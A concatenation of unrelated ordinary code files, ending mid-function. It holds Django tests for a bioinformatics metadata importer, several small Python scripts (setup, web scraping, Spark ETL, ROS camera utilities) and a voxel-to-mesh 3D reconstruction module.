METADATA = [{"PATO:0000122": {"value": 25, "unit": "thou"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
METADATA = [{"length": {"value": 25, "unit": "UO:0010012"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
def test_import_valid_sample_attributes(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR123", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# Test import_metadata()
#
def test_import_valid_metadata(self):
METADATA = [
{
"sample_accession": "SRR123",
"attributes": [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}],
}
]
import_metadata(METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# End-to-end test
#
@vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml")
def test_management_command(self):
sample = Sample()
sample.accession_code = "DRR001173"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
command = Command()
SOURCE_NAME = "refinebio_tests"
command.handle(file=TEST_METADATA, source_name=SOURCE_NAME, methods_url="ccdatalab.org")
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = sample.contributed_metadata
self.assertEqual(
set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()),
{"value", "confidence"},
)
self.assertEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name,
"female",
)
self.assertAlmostEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"], 0.7856624891880539
)
| [
"data_refinery_common.models.OntologyTerm",
"data_refinery_common.models.SampleAttribute.objects.all",
"vcr.use_cassette",
"data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_sample_attributes",
"data_refinery_foreman.foreman.management.commands.import_external_sample... | [((4472, 4575), 'vcr.use_cassette', 'vcr.use_cassette', (['"""/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml"""'], {}), "(\n '/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml'\n )\n", (4488, 4575), False, 'import vcr\n'), ((599, 611), 'data_refinery_common.models.Experiment', 'Experiment', ([], {}), '()\n', (609, 611), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((985, 993), 'data_refinery_common.models.Sample', 'Sample', ([], {}), '()\n', (991, 993), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1214, 1243), 'data_refinery_common.models.ExperimentSampleAssociation', 'ExperimentSampleAssociation', ([], {}), '()\n', (1241, 1243), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1424, 1432), 'data_refinery_common.models.Sample', 'Sample', ([], {}), '()\n', (1430, 1432), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1658, 1687), 'data_refinery_common.models.ExperimentSampleAssociation', 'ExperimentSampleAssociation', ([], {}), '()\n', (1685, 1687), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1925, 1939), 'data_refinery_common.models.OntologyTerm', 'OntologyTerm', ([], {}), '()\n', (1937, 1939), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2064, 2078), 'data_refinery_common.models.OntologyTerm', 'OntologyTerm', ([], {}), '()\n', (2076, 2078), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2207, 2221), 'data_refinery_common.models.Contribution', 'Contribution', ([], {}), '()\n', (2219, 2221), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2694, 2757), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_sample_attributes', 'import_sample_attributes', (['"""SRR789"""', 'METADATA', 'self.contribution'], {}), "('SRR789', METADATA, self.contribution)\n", (2718, 2757), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((3399, 3462), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_sample_attributes', 'import_sample_attributes', (['"""SRR123"""', 'METADATA', 'self.contribution'], {}), "('SRR123', METADATA, self.contribution)\n", (3423, 3462), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((4068, 4112), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_metadata', 'import_metadata', (['METADATA', 'self.contribution'], {}), '(METADATA, self.contribution)\n', (4083, 4112), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((4622, 4630), 'data_refinery_common.models.Sample', 'Sample', ([], {}), '()\n', (4628, 4630), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((4832, 4841), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.Command', 'Command', ([], {}), '()\n', (4839, 4841), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((3563, 3606), 'data_refinery_common.models.Sample.objects.get', 'Sample.objects.get', ([], {'accession_code': '"""SRR123"""'}), "(accession_code='SRR123')\n", (3581, 3606), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((4213, 4256), 'data_refinery_common.models.Sample.objects.get', 'Sample.objects.get', ([], {'accession_code': '"""SRR123"""'}), "(accession_code='SRR123')\n", (4231, 4256), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2783, 2812), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (2810, 2812), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((3489, 3518), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (3516, 3518), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((4139, 4168), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (4166, 4168), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((5005, 5034), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (5032, 5034), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n')] |
from setuptools import setup, find_packages
setup(
name='simplexapiclient',
version='0.0.1',
url='https://github.com/IngoKl/simple-xapi-client.git',
author='<NAME>',
author_email='<EMAIL>',
description='A minimalistic xAPI client written in Python',
packages=find_packages(),
install_requires=['requests', 'pytest'],
) | [
"setuptools.find_packages"
] | [((288, 303), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (301, 303), False, 'from setuptools import setup, find_packages\n')] |
"""File of parameters to be used throughout the notebook."""
import os
# # # # # #
### Ch15
# # # # # #
###
N_STEPS = 50
### saving stuff
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "rnn"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID) | [
"os.path.join"
] | [((197, 249), 'os.path.join', 'os.path.join', (['PROJECT_ROOT_DIR', '"""images"""', 'CHAPTER_ID'], {}), "(PROJECT_ROOT_DIR, 'images', CHAPTER_ID)\n", (209, 249), False, 'import os\n')] |
import sys
from etl.entities_registry import get_spark_job_by_entity_name
def main(argv):
"""
Calls the needed job according to the entity
:param list argv: the list elements should be:
[1]: Entity name
[2:]: Rest of parameters (the paths to the parquet files needed for the job).
Last parameter is always the output path
"""
entity_name = argv[1]
args_without_entity = argv[0:1] + argv[2:]
job_method = get_spark_job_by_entity_name(entity_name)
job_method(args_without_entity)
if __name__ == "__main__":
sys.exit(main(sys.argv))
| [
"etl.entities_registry.get_spark_job_by_entity_name"
] | [((496, 537), 'etl.entities_registry.get_spark_job_by_entity_name', 'get_spark_job_by_entity_name', (['entity_name'], {}), '(entity_name)\n', (524, 537), False, 'from etl.entities_registry import get_spark_job_by_entity_name\n')] |
#! /usr/bin/env python3.6
from urllib.request import urlopen
from urllib.error import HTTPError
from bs4 import BeautifulSoup
try:
html = urlopen("https://en.wikipedia.org/wiki/Kevin_Bacon")
except HTTPError as e:
print(e)
bs_obj = BeautifulSoup(html, "html.parser")
for link in bs_obj.findAll("a"):
print(f"link = {link}")
print(f"link.attrs = {link.attrs}")
if('href' in link.attrs):
print(link['href'])
print("--------------")
| [
"bs4.BeautifulSoup",
"urllib.request.urlopen"
] | [((243, 277), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""html.parser"""'], {}), "(html, 'html.parser')\n", (256, 277), False, 'from bs4 import BeautifulSoup\n'), ((144, 196), 'urllib.request.urlopen', 'urlopen', (['"""https://en.wikipedia.org/wiki/Kevin_Bacon"""'], {}), "('https://en.wikipedia.org/wiki/Kevin_Bacon')\n", (151, 196), False, 'from urllib.request import urlopen\n')] |
from django.db.models import CharField, ManyToManyField
from django.utils.translation import gettext_lazy as _
from app.utils.models import BaseModel
from app.users.models import User
class Enterprise(BaseModel):
name = CharField(_("Name of Enterprise"), max_length=255)
members = ManyToManyField(User, through="UserEnterprise", related_name="enterprises")
| [
"django.utils.translation.gettext_lazy",
"django.db.models.ManyToManyField"
] | [((291, 366), 'django.db.models.ManyToManyField', 'ManyToManyField', (['User'], {'through': '"""UserEnterprise"""', 'related_name': '"""enterprises"""'}), "(User, through='UserEnterprise', related_name='enterprises')\n", (306, 366), False, 'from django.db.models import CharField, ManyToManyField\n'), ((236, 259), 'django.utils.translation.gettext_lazy', '_', (['"""Name of Enterprise"""'], {}), "('Name of Enterprise')\n", (237, 259), True, 'from django.utils.translation import gettext_lazy as _\n')] |
#! /usr/bin/env python
import rospy
import math
from pprint import pprint
from access_teleop_msgs.msg import DeltaPX, PX, PXAndTheta, Theta
from image_geometry import PinholeCameraModel
from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3
from std_msgs.msg import Header, ColorRGBA
from visualization_msgs.msg import InteractiveMarker, InteractiveMarkerControl, InteractiveMarkerFeedback
from visualization_msgs.msg import Marker
import camera_info_messages
# Created by Tim and modified by Xinyi
camera_info_mapping = {'camera1': camera_info_messages.camera1, 'camera2': camera_info_messages.camera2, 'camera3': camera_info_messages.camera3}
# Xinyi modified: Change the camera angle for limb manipulation
# transform_broadcaster_mapping = {
# 'camera1': ((0.7, 0, 2.3), (-0.70711, -0.70711, 0, 0), rospy.Time(10), 'camera1', 'base_link'),
# 'camera2': ((0.9, -1.2, 0.8), (-0.70711, 0, 0, 0.70711), rospy.Time(10), 'camera2', 'base_link'),
# 'camera3': ((1.7, -0.1, 0.8), (0.5, 0.5, -0.5, -0.5), rospy.Time(10), 'camera3', 'base_link')
# }
transform_broadcaster_mapping = {
'camera1': ((0.7, 0, 2.0), (-0.70711, -0.70711, 0, 0), rospy.Time(10), 'camera1', 'base_link'), # top
'camera2': ((0.7, -1.2, 0.8), (-0.70711, 0, 0, 0.70711), rospy.Time(10), 'camera2', 'base_link'), # left
'camera3': ((1.5, 0, 0.8), (0.5, 0.5, -0.5, -0.5), rospy.Time(10), 'camera3', 'base_link') # front
}
orientation_mapping = {'camera1': 2, 'camera2': 1, 'camera3': 1}
orientation_sign_mapping = {'camera1': -1, 'camera2': 1, 'camera3': 1}
camera_names = ['camera1', 'camera2', 'camera3']
pr2_move_group_name = "right_arm"
def wait_for_time():
"""Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
def quat_array_to_quat(quat_array):
new_quat = Quaternion()
new_quat.x = quat_array[0]
new_quat.y = quat_array[1]
new_quat.z = quat_array[2]
new_quat.w = quat_array[3]
return new_quat
def publish_camera_transforms(tb):
for key in transform_broadcaster_mapping:
transform_data = transform_broadcaster_mapping[key]
tb.sendTransform(transform_data[0], transform_data[1], transform_data[2], transform_data[3], transform_data[4])
def publish_camera_transforms_debug(tb, pub):
id = 0
for key in transform_broadcaster_mapping:
transform_data = transform_broadcaster_mapping[key]
tb.sendTransform(transform_data[0], transform_data[1], transform_data[2], transform_data[3], transform_data[4])
# Xinyi modified for debug: visualize camera poses
marker = Marker(
type=Marker.TEXT_VIEW_FACING,
id=id,
pose=Pose(Point(transform_data[0][0], transform_data[0][1], transform_data[0][2]),
Quaternion(transform_data[1][0], transform_data[1][1], transform_data[1][2], transform_data[1][3])),
scale=Vector3(0.06, 0.06, 0.06),
header=Header(frame_id='base_link'),
color=ColorRGBA(0.0, 1.0, 0.0, 0.8),
text=transform_data[3])
pub.publish(marker)
id += 1
def publish_camera_info(publishers):
for pub in publishers:
pub[1].publish(camera_info_mapping[pub[0]])
def publish_gripper_pixels(camera_model, move_group, pub):
data_array = []
ps = move_group.get_current_pose()
for camera in camera_names:
camera_model.fromCameraInfo(camera_info_mapping[camera])
x, y, z = getCameraDistances(camera, ps)
(u, v) = camera_model.project3dToPixel((x, y, z))
data_array.append([camera, int(u), int(v)])
for array in data_array:
px_msg = PX()
px_msg.camera_name = array[0]
px_msg.pixel_x = array[1]
px_msg.pixel_y = array[2]
pub.publish(px_msg)
def getCameraDistances(camera_name, ps):
if camera_name == "camera1":
camera_location = transform_broadcaster_mapping["camera1"][0]
z = camera_location[2] - ps.pose.position.z
x = ps.pose.position.x - camera_location[0]
y = camera_location[1] - ps.pose.position.y
elif camera_name == "camera2":
camera_location = transform_broadcaster_mapping["camera2"][0]
z = camera_location[1] - ps.pose.position.y
x = camera_location[0] - ps.pose.position.x
y = camera_location[2] - ps.pose.position.z
elif camera_name == "camera3":
camera_location = transform_broadcaster_mapping["camera3"][0]
z = camera_location[1] - ps.pose.position.y
x = camera_location[0] - ps.pose.position.x
y = camera_location[2] - ps.pose.position.z
else:
raise ValueError('Did not pass in a valid camera_name')
return x,y,z
def dpx_to_distance(dx, dy, camera_name, current_ps, offset):
big_z_mappings = {'camera1': transform_broadcaster_mapping['camera1'][0][2] - current_ps.pose.position.z, # x-y plane
'camera2': transform_broadcaster_mapping['camera2'][0][1] - current_ps.pose.position.y, # x-z plane
'camera3': transform_broadcaster_mapping['camera3'][0][0] - current_ps.pose.position.x} # y-z plane
camera_model = PinholeCameraModel()
camera_model.fromCameraInfo(camera_info_mapping[camera_name])
x, y, z = camera_model.projectPixelTo3dRay((dx, dy))
x_center, y_center, z_center = camera_model.projectPixelTo3dRay((0, 0))
big_z = abs(big_z_mappings[camera_name])
big_x = (x / z) * big_z # Use law of similar trianges to solve
big_y = (y / z) * big_z
big_x_center = (x_center / z_center) * big_z
big_y_center = (y_center / z_center) * big_z
if offset:
return big_x - big_x_center, big_y - big_y_center
else:
return big_x, big_y
def delta_modified_stamped_pose(x_distance, y_distance, camera_name, original_pose_stamped):
modified_ps = original_pose_stamped
if camera_name == 'camera1':
modified_ps.pose.position.x += x_distance # These directions came from looking at the cameras in rviz
modified_ps.pose.position.y -= y_distance
elif camera_name == 'camera2':
modified_ps.pose.position.x += x_distance
modified_ps.pose.position.z -= y_distance
elif camera_name == 'camera3':
modified_ps.pose.position.y += x_distance
modified_ps.pose.position.z -= y_distance
else:
raise ValueError('Did not pass in a valid camera_name')
return modified_ps
| [
"geometry_msgs.msg.Vector3",
"image_geometry.PinholeCameraModel",
"std_msgs.msg.ColorRGBA",
"access_teleop_msgs.msg.PX",
"geometry_msgs.msg.Quaternion",
"rospy.Time",
"geometry_msgs.msg.Point",
"std_msgs.msg.Header"
] | [((1886, 1898), 'geometry_msgs.msg.Quaternion', 'Quaternion', ([], {}), '()\n', (1896, 1898), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((5257, 5277), 'image_geometry.PinholeCameraModel', 'PinholeCameraModel', ([], {}), '()\n', (5275, 5277), False, 'from image_geometry import PinholeCameraModel\n'), ((1199, 1213), 'rospy.Time', 'rospy.Time', (['(10)'], {}), '(10)\n', (1209, 1213), False, 'import rospy\n'), ((1314, 1328), 'rospy.Time', 'rospy.Time', (['(10)'], {}), '(10)\n', (1324, 1328), False, 'import rospy\n'), ((1422, 1436), 'rospy.Time', 'rospy.Time', (['(10)'], {}), '(10)\n', (1432, 1436), False, 'import rospy\n'), ((3753, 3757), 'access_teleop_msgs.msg.PX', 'PX', ([], {}), '()\n', (3755, 3757), False, 'from access_teleop_msgs.msg import DeltaPX, PX, PXAndTheta, Theta\n'), ((2993, 3018), 'geometry_msgs.msg.Vector3', 'Vector3', (['(0.06)', '(0.06)', '(0.06)'], {}), '(0.06, 0.06, 0.06)\n', (3000, 3018), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((3043, 3071), 'std_msgs.msg.Header', 'Header', ([], {'frame_id': '"""base_link"""'}), "(frame_id='base_link')\n", (3049, 3071), False, 'from std_msgs.msg import Header, ColorRGBA\n'), ((3095, 3124), 'std_msgs.msg.ColorRGBA', 'ColorRGBA', (['(0.0)', '(1.0)', '(0.0)', '(0.8)'], {}), '(0.0, 1.0, 0.0, 0.8)\n', (3104, 3124), False, 'from std_msgs.msg import Header, ColorRGBA\n'), ((2770, 2841), 'geometry_msgs.msg.Point', 'Point', (['transform_data[0][0]', 'transform_data[0][1]', 'transform_data[0][2]'], {}), '(transform_data[0][0], transform_data[0][1], transform_data[0][2])\n', (2775, 2841), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((2870, 2972), 'geometry_msgs.msg.Quaternion', 'Quaternion', (['transform_data[1][0]', 'transform_data[1][1]', 'transform_data[1][2]', 'transform_data[1][3]'], {}), '(transform_data[1][0], transform_data[1][1], transform_data[1][2],\n transform_data[1][3])\n', (2880, 2972), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((1786, 1798), 'rospy.Time', 'rospy.Time', ([], {}), '()\n', (1796, 1798), False, 'import rospy\n')] |
import numpy as np
import torch
import torch.nn.functional as F
import skimage.measure as sk
import time
import pyrender
import pymesh
import trimesh
from pyemd import emd_samples
import chamfer_python
import binvox_rw
from glob import glob
D2R = np.pi/180.0
voxsize = 32
sample_size = 2048
def RotatePhi(phi):
return np.array([[1, 0, 0, 0],
[0, np.cos(D2R*phi), np.sin(D2R*phi), 0],
[0, -np.sin(D2R*phi), np.cos(D2R*phi), 0],
[0, 0, 0, 1]])
def RotateAzimuth(phi):
return np.array([[np.cos(D2R*phi), np.sin(D2R*phi), 0, 0],
[-np.sin(D2R*phi), np.cos(D2R*phi), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
def RotateAlongAxis(theta, a, b, c):
return np.array([[a**2*(1-np.cos(D2R*theta)) + np.cos(D2R*theta), a*b*(1-np.cos(D2R*theta)) - c*np.sin(D2R*theta), a*c*(1-np.cos(D2R*theta)) + b*np.sin(D2R*theta), 0],
[a*b*(1-np.cos(D2R*theta)) + c*np.sin(D2R*theta), b**2*(1-np.cos(D2R*theta)) + np.cos(D2R*theta), b*c*(1-np.cos(D2R*theta)) - a*np.sin(D2R*theta), 0],
[a*c*(1-np.cos(D2R*theta)) - b*np.sin(D2R*theta), b*c*(1-np.cos(D2R*theta)) + a*np.sin(D2R*theta), c**2*(1-np.cos(D2R*theta)) + np.cos(D2R*theta), 0],
[0, 0, 0, 1]])
# generate meshgrid
# [depth, height, width]
def get_meshgrid(depth = voxsize, height = voxsize, width = voxsize, ratio = 1.0):
x_mesh = np.repeat(np.repeat(np.linspace(-ratio, ratio, width)[np.newaxis, :], height, axis=0)[np.newaxis, :, :], depth, axis=0)
y_mesh = np.repeat(np.repeat(np.linspace(-ratio, ratio, height)[:, np.newaxis], width, axis=-1)[np.newaxis, :, :], depth, axis=0)
z_mesh = np.repeat(np.repeat(np.linspace(-ratio, ratio, depth)[:, np.newaxis], height, axis= -1)[:,:, np.newaxis], width, axis=-1)
x_expand = np.expand_dims(x_mesh, axis = -1)
y_expand = np.expand_dims(y_mesh, axis = -1)
z_expand = np.expand_dims(z_mesh, axis = -1)
meshgrid = np.concatenate((x_expand, np.concatenate((y_expand, z_expand), axis = -1)), axis = -1)
return meshgrid
# transform meshgrid given transformation matrix
def get_transformed_meshgrid(meshgrid, transform_matrix, depth = voxsize, height = voxsize, width = voxsize):
meshgrid_flat = meshgrid.transpose(3, 0, 1, 2).reshape(3,-1)
one = np.ones((1, meshgrid_flat.shape[1]))
meshgrid_expand = np.vstack((meshgrid_flat, one))
transformed_meshgrid = (transform_matrix @ meshgrid_expand)
transformed_meshgrid = (transformed_meshgrid[0:3, :]/transformed_meshgrid[3, :]).reshape(3, depth, height, width).transpose(1, 2, 3, 0)
return torch.tensor(transformed_meshgrid, dtype=torch.float)
######################
# single transform #
######################
# compute transformation matrix
def get_transform_matrix(azimuth, elevation, scale = np.sqrt(3)):
rot_base = RotateAlongAxis(90, 0, 0, 1) @ RotateAlongAxis(-90, 1, 0, 0)
rot_m = RotateAlongAxis(azimuth, 0, 1, 0) @ RotateAlongAxis(-elevation, 1, 0, 0) @ rot_base
sca_m = np.array([[scale, 0, 0, 0],
[0, scale, 0, 0],
[0, 0, scale, 0],
[0, 0, 0, 1]])
return rot_m @ sca_m
# group function for transform voxel in pytorch tensor
def get_transformed_vox(vox_torch, azimuth, elevation, scale = np.sqrt(3)):
meshgird = get_transformed_meshgrid(get_meshgrid(voxsize, voxsize, voxsize), get_transform_matrix(azimuth, elevation, scale), voxsize, voxsize, voxsize)
transformedVox = F.grid_sample(vox_torch, meshgird.unsqueeze(0), mode='bilinear', padding_mode='zeros', align_corners=False)
return transformedVox[0]
########################
# Relative transform #
########################
def get_relative_transform_matrix(azimuth_1, elevation_1, azimuth_2, elevation_2):
rot_m = RotateAlongAxis(elevation_1, 0, 0, 1) @ RotateAlongAxis(azimuth_1, 1, 0, 0) @ RotateAlongAxis(azimuth_2, 1, 0, 0) @ RotateAlongAxis(elevation_2, 0, 0, 1)
scale = 1
#scale = 1/np.sqrt(3)
sca_m = np.array([[scale, 0, 0, 0],
[0, scale, 0, 0],
[0, 0, scale, 0],
[0, 0, 0, 1]])
return rot_m @ sca_m
def get_relative_transformed_vox(vox_torch, azimuth_1, elevation_1, azimuth_2, elevation_2, device, voxsize = 32, align_mode = 'zeros'):
meshgird = get_transformed_meshgrid(get_meshgrid(voxsize, voxsize, voxsize),
get_relative_transform_matrix(azimuth_1, elevation_1, azimuth_2, elevation_2),
voxsize, voxsize, voxsize).to(device)
transformedVox = F.grid_sample(vox_torch, meshgird.unsqueeze(0), mode='bilinear', padding_mode=align_mode, align_corners=False)
return transformedVox
#########
# SDF #
#########
# transformation function to rotate sdf indice
def get_transform_matrix_sdf(azimuth, elevation, scale = 1.0):
rot_base = RotateAlongAxis(90, 0, 1, 0) @ RotateAlongAxis(-90, 1, 0, 0)
rot_m = RotateAlongAxis(azimuth, 0, 1, 0) @ RotateAlongAxis(-elevation, 0, 0, 1) @ rot_base
sca_m = np.array([[scale, 0, 0, 0],
[0, scale, 0, 0],
[0, 0, scale, 0],
[0, 0, 0, 1]])
return rot_m @ sca_m
# group function to get transformed sdf indice
def get_transformed_indices(indices, azimuth, elevation, scale = 1/np.sqrt(3)):
transform_matrix = get_transform_matrix_sdf(-azimuth, -elevation, scale)[0:3, 0:3]
transformed_indices = indices @ transform_matrix
return transformed_indices
# convert sdf to voxel
def sdf2Voxel(sample_pt, sample_sdf_val, fill = 0):
sample_pt = ((sample_pt + np.array([0.5, 0.5, 0.5]))* voxsize).astype(int)
sample_pt = np.clip(sample_pt, 0, voxsize-1)
v = fill * np.ones((voxsize, voxsize, voxsize))
v[sample_pt[:,0], sample_pt[:,1], sample_pt[:,2]] = sample_sdf_val
return v
# advanced indexing 2x2x2 context from voxel
def getContext(sample_pt_query, vox):
# sample_pt bxcxdimxdimxdim
# vox bxmx3
channel_size = vox.shape[1]
batch_size, sample_size, _ = sample_pt_query.shape
meshgrid_base = torch.Tensor(np.meshgrid(np.arange(0, batch_size), np.arange(0, channel_size), np.arange(0, 2), np.arange(0, 2), np.arange(0, 2))).int()
context = torch.empty((batch_size, sample_size, channel_size, 2, 2, 2))
for j in range(context.shape[1]):
context[:, j, :, :, :, :] = vox[
meshgrid_base[0].long(),
meshgrid_base[1].long(),
(meshgrid_base[2] + sample_pt_query[:, j, 0].reshape(1, -1, 1, 1, 1)).long(),
(meshgrid_base[3] + sample_pt_query[:, j, 1].reshape(1, -1, 1, 1, 1)).long(),
(meshgrid_base[4] + sample_pt_query[:, j, 2].reshape(1, -1, 1, 1, 1)).long()
].transpose(0, 1)
# b x c x m x 2 x 2 x 2
return context.transpose(1, 2)
def trilinearInterpolation(context, dx, dy, dz):
v0 = context[:, :, :, 0, 0, 0]*(1-dx)*(1-dy)*(1-dz)
v1 = context[:, :, :, 1, 0, 0]*dx*(1-dy)*(1-dz)
v2 = context[:, :, :, 0, 1, 0]*(1-dx)*dy*(1-dz)
v3 = context[:, :, :, 1, 1, 0]*dx*dy*(1-dz)
v4 = context[:, :, :, 0, 0, 1]*(1-dx)*(1-dy)*dz
v5 = context[:, :, :, 1, 0, 1]*dx*(1-dy)*dz
v6 = context[:, :, :, 0, 1, 1]*(1-dx)*dy*dz
v7 = context[:, :, :, 1, 1, 1]*dx*dy*dz
# b x c x m 1
return v0 + v1 + v2 + v3 + v4 + v5 + v6 + v7
# generate mesh from continuous model
def generate_mesh(continuous, unet, out_vox, z, device, vox_res = 32, grid_res = 64, batch_size = 32, azimuth = 0, elevation = 0, isosurface = 0.0, conditional=True):
start_time = time.time()
vox = np.zeros((grid_res, grid_res, grid_res))
idx = np.array(np.where(vox == 0))
# normalize
sample_pt = (torch.t(torch.tensor(idx/grid_res, dtype=torch.float)) - 0.5)
sample_pt = sample_pt.reshape(-1, sample_size, 3)
sample_pt_normalized = sample_pt + torch.tensor([0.5, 0.5, 0.5])
# (0, 63)
sample_pt_scale = torch.clamp(sample_pt_normalized* (vox_res-1), 0, (vox_res-1)-1e-5)
# (0, 62]
sample_pt_query = torch.clamp((sample_pt_scale).int(), 0, (vox_res-2))
sample_pt_distance = sample_pt_scale - sample_pt_query
vox_feature = unet(out_vox, z).repeat(batch_size, 1, 1, 1, 1).detach().cpu() if conditional else unet(out_vox).repeat(batch_size, 1, 1, 1, 1).detach().cpu()
#print("--- %s seconds ---" % (time.time() - start_time))
#print("Data generation")
pre_sdf_list = []
for i in range(int(sample_pt.shape[0]/batch_size)):
start = i*batch_size
end = (i + 1)*batch_size
context = getContext(sample_pt_query[start:end, :, :], vox_feature)
dx = sample_pt_distance[start:end, :, 0].unsqueeze(1)
dy = sample_pt_distance[start:end, :, 1].unsqueeze(1)
dz = sample_pt_distance[start:end, :, 2].unsqueeze(1)
# local feature
con = trilinearInterpolation(context, dx, dy, dz).to(device)
# global feature
latent = z.squeeze(-1).squeeze(-1).repeat(batch_size, 1, sample_size)
# point
sample_pt_batch = sample_pt[start:end, :, :].transpose(-1, -2).to(device)
sample_pt_batch = sample_pt_batch.transpose(-1, -2).reshape(-1, 3)
con_batch = con.transpose(-1, -2).reshape(-1, 32)
z_batch = latent.transpose(-1, -2).reshape(-1, 256)
# avoid occupying gpu memory
pred_sdf_batch = continuous(sample_pt_batch,
con_batch,
z_batch,
).squeeze(1).detach().cpu()
pre_sdf_list.append(pred_sdf_batch)
pred_sdf = torch.cat(pre_sdf_list).reshape(-1,)
vox[tuple([idx[0], idx[1], idx[2]])] = pred_sdf[:].numpy()
#print(vox.shape)
#print("--- %s seconds ---" % (time.time() - start_time))
#print("Success generation")
try:
verts, faces, _, _ = sk.marching_cubes_lewiner(vox, level=isosurface)
#mesh = pymesh.form_mesh(verts, faces)
#transform_matrix = get_relative_transform_matrix(azimuth, elevation, 0, 0)[0:3, 0:3]
#transformed_vertices = mesh.vertices @ transform_matrix
mesh = trimesh.Trimesh(verts, faces)
#trimesh.repair.fix_inversion(mesh)
trimesh.repair.fill_holes(mesh)
mesh_py = pymesh.form_mesh(mesh.vertices, mesh.faces)
return mesh_py
except:
print("Failed generation")
return None
# generate mesh from voxel
def mesh_from_voxel(vox_torch):
verts, faces, _, _ = sk.marching_cubes_lewiner(vox_torch.detach().cpu().numpy(), level=0.5)
mesh_py = pymesh.form_mesh(2*verts, faces)
mesh = trimesh.Trimesh(mesh_py.vertices,mesh_py.faces)
trimesh.repair.fix_inversion(mesh)
trimesh.repair.fill_holes(mesh)
return mesh
# render a mesh with pyrender render
def render(mesh):
model = trimesh.Trimesh(mesh.vertices,mesh.faces)
mesh_py = pyrender.Mesh.from_trimesh(model)
scene = pyrender.Scene()
scene.add(mesh_py)
viewer = pyrender.Viewer(scene, use_raymond_lighting=True, point_size=2)
def mesh_test(mesh_py, dim = 64, count = 16384):
